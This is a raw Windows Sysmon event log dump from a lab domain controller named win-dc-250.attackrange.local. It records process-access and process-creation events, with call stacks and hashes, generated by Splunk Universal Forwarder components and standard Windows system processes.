Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.155{08A6967A-46F2-6000-F704-000000009A01}44803536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46F2-6000-F704-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46F2-6000-F704-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.014{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46F2-6000-F704-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.016{08A6967A-46F2-6000-F704-000000009A01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46F4-6000-F904-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46F4-6000-F904-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46F4-6000-F904-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:20.249{08A6967A-46F4-6000-F904-000000009A01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 